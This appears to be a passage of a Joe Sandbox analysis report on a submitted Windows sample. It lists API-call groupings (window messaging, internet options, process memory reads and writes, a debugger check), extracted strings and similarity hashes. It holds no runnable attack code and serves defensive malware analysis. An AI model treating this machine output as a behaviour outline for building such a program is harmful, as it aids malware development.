                                                      • API ID: Window$ColorCreateMessageObjectRectSendStock
                                                      • String ID: static
                                                      • API String ID: 1983116058-2160076837
                                                      • Opcode ID: ced01894a1890fad7931fc8f5a40b2a04fbbec072c9fc6bd691851dce92dcdd9
                                                      • Instruction ID: 7108f0c2795dc9ae099345590bdd04690bc36cefc534bd453db6c0555f9c539a
                                                      • Opcode Fuzzy Hash: ced01894a1890fad7931fc8f5a40b2a04fbbec072c9fc6bd691851dce92dcdd9
                                                      • Instruction Fuzzy Hash: 3E21567261020AAFDF04DFA8DC45AFA7BAAFB08304F005628F996E2250D675E850DB60
                                                      APIs
                                                      • _memset.LIBCMT ref: 00642A22
                                                      • GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00642A41
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: InfoItemMenu_memset
                                                      • String ID: 0
                                                      • API String ID: 2223754486-4108050209
                                                      • Opcode ID: 55946d57f50de829209fe4b208a9aad9fe1a987f1d0cced05b14dd8aec60b5a9
                                                      • Instruction ID: a62e1bba7d5522e554dbc3e3c23907631a1b4313271b5df840505226b397c433
                                                      • Opcode Fuzzy Hash: 55946d57f50de829209fe4b208a9aad9fe1a987f1d0cced05b14dd8aec60b5a9
                                                      • Instruction Fuzzy Hash: A011D332901116ABCB30EF98D854BDAB7BAAB46304FA44021FD56E7390D770AD86C791
                                                      APIs
                                                      • InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0065222C
                                                      • InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00652255
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Internet$OpenOption
                                                      • String ID: <local>
                                                      • API String ID: 942729171-4266983199
                                                      • Opcode ID: cdc7f501b7c08a05a2aaca96dc05af3770d9a10eef8e348fd9e534895ad2154c
                                                      • Instruction ID: bf193211a3de42aa3637e50ca9d1cbf17c0f9a612e891577f811579243b11da0
                                                      • Opcode Fuzzy Hash: cdc7f501b7c08a05a2aaca96dc05af3770d9a10eef8e348fd9e534895ad2154c
                                                      • Instruction Fuzzy Hash: 05110674501226BADB248F119CA4EF7FFAEFF17352F10822AFD1486500D2705A89D6F0
                                                      APIs
                                                      • SendMessageW.USER32(?,?,?,?), ref: 00668530
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: @U=u
                                                      • API String ID: 3850602802-2594219639
                                                      • Opcode ID: abcd996e38dc21693a07a62e5f98a66701cf0954042c03eac0df53102e07916b
                                                      • Instruction ID: b09032031df6c19019061a643b9e2f12bbbcea44b1145c82fe0120594a5b690d
                                                      • Opcode Fuzzy Hash: abcd996e38dc21693a07a62e5f98a66701cf0954042c03eac0df53102e07916b
                                                      • Instruction Fuzzy Hash: E821E775604209EFCB55DFA4D840CEA7BB6FB4D350B004254FD16A7360DA31ED61DBA0
                                                      APIs
                                                      • SendMessageW.USER32(?,00000401,?,00000000), ref: 0066662C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: @U=u$button
                                                      • API String ID: 3850602802-1762282863
                                                      • Opcode ID: 20772d8ce5a6a1d505e18daf93a45031878e112855e162c7b22a4f2c7e45b921
                                                      • Instruction ID: a43cca0f9b12bb2b5dd7db377d5341786ce3ccb00fdca0734943de1e788d9f16
                                                      • Opcode Fuzzy Hash: 20772d8ce5a6a1d505e18daf93a45031878e112855e162c7b22a4f2c7e45b921
                                                      • Instruction Fuzzy Hash: 8F11E172140205ABDF119F60EC11FEA376BFF48314F115218FA52E7290C776EC519B60
                                                      APIs
                                                      • SendMessageW.USER32(?,0000133E,00000000,?), ref: 006678D8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: @U=u
                                                      • API String ID: 3850602802-2594219639
                                                      • Opcode ID: cf88a97e3be184eb252b7d8d087204280eacd23a15d9dced210b5074daccf9d0
                                                      • Instruction ID: 35239b22dbf3d272b72022df6556e9a1c508a5c3eba4263bb4e9b6e7491cae2c
                                                      • Opcode Fuzzy Hash: cf88a97e3be184eb252b7d8d087204280eacd23a15d9dced210b5074daccf9d0
                                                      • Instruction Fuzzy Hash: 5C11B130504744AFD720DF34C891AE7BBEABF06314F10861DE8AA97391DB7169459BA0
                                                      APIs
                                                        • Part of subcall function 006414BC: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00639296,?,?,00000034,00000800,?,00000034), ref: 006414E6
                                                      • SendMessageW.USER32(?,0000102B,?,00000000), ref: 00639509
                                                      • SendMessageW.USER32(?,0000102B,?,00000000), ref: 0063952E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$MemoryProcessWrite
                                                      • String ID: @U=u
                                                      • API String ID: 1195347164-2594219639
                                                      • Opcode ID: d48fe919334f6ba0caf60263f1115aed4075d8e70d0ab67617847f2261e71103
                                                      • Instruction ID: 6161d059ee170a0c5cc1755475b916d25dcd531e8b849b1e333d74c91b89161b
                                                      • Opcode Fuzzy Hash: d48fe919334f6ba0caf60263f1115aed4075d8e70d0ab67617847f2261e71103
                                                      • Instruction Fuzzy Hash: 65012B32900118ABDB11AF24DC86EEEBB79EB04320F00016AF925A71D1DBB06D95CFB0
                                                      APIs
                                                      • SendMessageW.USER32(?,00000406,00000000,00000000), ref: 006395FB
                                                      • SendMessageW.USER32(?,0000040D,?,00000000), ref: 0063962E
                                                        • Part of subcall function 00641487: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,006392C5,?,?,00000800,?,00001073,00000000,?,?), ref: 006414B1
                                                        • Part of subcall function 005E7BCC: _memmove.LIBCMT ref: 005E7C06
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$MemoryProcessRead_memmove
                                                      • String ID: @U=u
                                                      • API String ID: 339422723-2594219639
                                                      • Opcode ID: 3a1f58c0aba71954764a7c0b7fe0cb75b3441c08a528acdb17062aaa7038c0df
                                                      • Instruction ID: b90cdb09f03c1b9ac86211e805a821de1f3a1d0f495f1b39f4a4da90723bdb86
                                                      • Opcode Fuzzy Hash: 3a1f58c0aba71954764a7c0b7fe0cb75b3441c08a528acdb17062aaa7038c0df
                                                      • Instruction Fuzzy Hash: 31015B7190111CAFDB50AF60DC81EEA7BADFB19340F8080AAF64996151DE710E89CFE0
                                                      APIs
                                                      • VariantInit.OLEAUT32(?), ref: 0063C534
                                                        • Part of subcall function 0063C816: _memmove.LIBCMT ref: 0063C860
                                                        • Part of subcall function 0063C816: VariantInit.OLEAUT32(00000000), ref: 0063C882
                                                        • Part of subcall function 0063C816: VariantCopy.OLEAUT32(00000000,?), ref: 0063C88C
                                                      • VariantClear.OLEAUT32(?), ref: 0063C556
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Variant$Init$ClearCopy_memmove
                                                      • String ID: d}i
                                                      • API String ID: 2932060187-509633705
                                                      • Opcode ID: d8be6a4e18130ca9755e176b078e205b41633fe426c0fa373645a5af658296f7
                                                      • Instruction ID: cc7b399e9845293b21f8bb97b4865974cd096761e9b46c8ae9d638c38c9de758
                                                      • Opcode Fuzzy Hash: d8be6a4e18130ca9755e176b078e205b41633fe426c0fa373645a5af658296f7
                                                      • Instruction Fuzzy Hash: 1C11D2B19007099FC710DF9AD88489AFBF8FF18314B50856EE58AD7612D771AA49CF90
                                                      APIs
                                                        • Part of subcall function 005E2612: GetWindowLongW.USER32(?,000000EB), ref: 005E2623
                                                      • DefDlgProcW.USER32(?,0000002B,?,?,?,?,?,?,?,0061B93A,?,?,?), ref: 0066C5F1
                                                        • Part of subcall function 005E25DB: GetWindowLongW.USER32(?,000000EB), ref: 005E25EC
                                                      • SendMessageW.USER32(?,00000401,00000000,00000000), ref: 0066C5D7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: LongWindow$MessageProcSend
                                                      • String ID: @U=u
                                                      • API String ID: 982171247-2594219639
                                                      • Opcode ID: d403f0d77a8b7778b32eaae446bd9cef15ef034e23a16d758f3b8c1ad9e7b3c3
                                                      • Instruction ID: 73e003548555c891d3177b7143175f5b455a3be17d71994277c8af98b75f8cbb
                                                      • Opcode Fuzzy Hash: d403f0d77a8b7778b32eaae446bd9cef15ef034e23a16d758f3b8c1ad9e7b3c3
                                                      • Instruction Fuzzy Hash: B5019231200614ABCB25AF14DC48E7A3BA7FB85360F140129F9A71B2A1CB71A812DF61
                                                      APIs
                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0063954C
                                                      • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00639564
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: @U=u
                                                      • API String ID: 3850602802-2594219639
                                                      • Opcode ID: 2015942734ddb0a727c3b57d8c9b3a239893d49fb7f62f2b7879b2e79212a848
                                                      • Instruction ID: 69a65519734f68609c95296114506e3c9bef015a9ed57d68524f8c29c9e41e8e
                                                      • Opcode Fuzzy Hash: 2015942734ddb0a727c3b57d8c9b3a239893d49fb7f62f2b7879b2e79212a848
                                                      • Instruction Fuzzy Hash: CCE09B3574231176F2311665DC4AFD71E4BDB89B71F154035F705991E1C9D24DC28AF0
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: ClassName_wcscmp
                                                      • String ID: #32770
                                                      • API String ID: 2292705959-463685578
                                                      • Opcode ID: 76c930460c96f0bde383a082a2491ab574f75e65f340f3b8abaad2ccf59b79f7
                                                      • Instruction ID: 180ffdbab9c881a73ff60f5cee1fe19b8852090957703c14ad62abef263346b5
                                                      • Opcode Fuzzy Hash: 76c930460c96f0bde383a082a2491ab574f75e65f340f3b8abaad2ccf59b79f7
                                                      • Instruction Fuzzy Hash: 8CE0D1325042382BD710AB55EC45FA7F7ADDB45B71F011057FD04D3151D9609A5587E0
                                                      APIs
                                                        • Part of subcall function 0061B314: _memset.LIBCMT ref: 0061B321
                                                        • Part of subcall function 00600940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,0061B2F0,?,?,?,005E100A), ref: 00600945
                                                      • IsDebuggerPresent.KERNEL32(?,?,?,005E100A), ref: 0061B2F4
                                                      • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,005E100A), ref: 0061B303
                                                      Strings
                                                      • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 0061B2FE
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                      • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                      • API String ID: 3158253471-631824599
                                                      • Opcode ID: 3a1f20ab22bc6b2b0be27ccee853bf8aabcc6f7c4335104e48493b592dfd1d16
                                                      • Instruction ID: 9bbf7af71188f9890f736c41f3f2961b1f95c9b611be858fad2b7b0236b0d4a0
                                                      • Opcode Fuzzy Hash: 3a1f20ab22bc6b2b0be27ccee853bf8aabcc6f7c4335104e48493b592dfd1d16
                                                      • Instruction Fuzzy Hash: 74E06D702007418BD760EF68E4087827AEAEF04304F08AA2CE4A6C7740E7B4E584CBA1
                                                      APIs
                                                      • GetSystemDirectoryW.KERNEL32(?), ref: 00621775
                                                        • Part of subcall function 0065BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,0062195E,?), ref: 0065BFFE
                                                        • Part of subcall function 0065BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0065C010
                                                      • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 0062196D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                      • String ID: WIN_XPe
                                                      • API String ID: 582185067-3257408948
                                                      • Opcode ID: e8e7a5c5bc5032441486aadb619177b13ed556b1eb96bab1cc0172e9046f8423
                                                      • Instruction ID: cbd1e72395eb1e7d0e92afb95a76725a53046ad1a17f64c89443ee03fdd8a17b
                                                      • Opcode Fuzzy Hash: e8e7a5c5bc5032441486aadb619177b13ed556b1eb96bab1cc0172e9046f8423
                                                      • Instruction Fuzzy Hash: 1BF06D70808018DFCB25DFA5E984AECBBFAFB59301F141096E002BA190C7708F86DF60
                                                      APIs
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0066596E
                                                      • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00665981
                                                        • Part of subcall function 00645244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006452BC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: FindMessagePostSleepWindow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 529655941-2988720461
                                                      • Opcode ID: 6444ef50ff5a74394437ab44e0309c1052b60227ffd0450e0a3178262d027c71
                                                      • Instruction ID: 430ce7125a5252e3bb5724b55bd36dc433eb61ea4d2be6fae3e34849bd6e7f0b
                                                      • Opcode Fuzzy Hash: 6444ef50ff5a74394437ab44e0309c1052b60227ffd0450e0a3178262d027c71
                                                      • Instruction Fuzzy Hash: A7D0C931384711BBE7A4AB70EC0BF976A16AB11B50F01282AB24AAA1D1CDE09800C654
                                                      APIs
                                                      • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006659AE
                                                      • PostMessageW.USER32(00000000), ref: 006659B5
                                                        • Part of subcall function 00645244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 006452BC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: FindMessagePostSleepWindow
                                                      • String ID: Shell_TrayWnd
                                                      • API String ID: 529655941-2988720461
                                                      • Opcode ID: 608928d0d39a313d8e585225963b46d49ebd338992132b54c5d5a45221171c2c
                                                      • Instruction ID: 5f1384d6c89364bbe57fc944252b3bd71c585e54142ecdf1b78f8aa47d20685c
                                                      • Opcode Fuzzy Hash: 608928d0d39a313d8e585225963b46d49ebd338992132b54c5d5a45221171c2c
                                                      • Instruction Fuzzy Hash: 99D0C9313807117BE7A4AB70EC0BF976616AB16B50F01282AB246EA1D1CDE0A800C658
                                                      APIs
                                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 006393E9
                                                      • SendMessageW.USER32(00000000,00001200,00000000,00000000), ref: 006393F7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.1383668327.00000000005E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005E0000, based on PE: true
                                                      • Associated: 00000000.00000002.1383644416.00000000005E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.000000000066F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383726819.0000000000694000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383781584.000000000069E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.1383804287.00000000006A7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_5e0000_4287eV6mBc.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID: @U=u
                                                      • API String ID: 3850602802-2594219639
                                                      • Opcode ID: 60f2b425934d00d301592950cfcb1893b1d7f011be4fec7a7d03675efc96a333
                                                      • Instruction ID: 019537e175b9efd94927366697851e6dafd1110263a100444920f60fa085d21e
                                                      • Opcode Fuzzy Hash: 60f2b425934d00d301592950cfcb1893b1d7f011be4fec7a7d03675efc96a333
                                                      • Instruction Fuzzy Hash: 5CC00231145180BAEB211B77FC0DD873E3EE7CBF52711116CB221D50B586A50095D634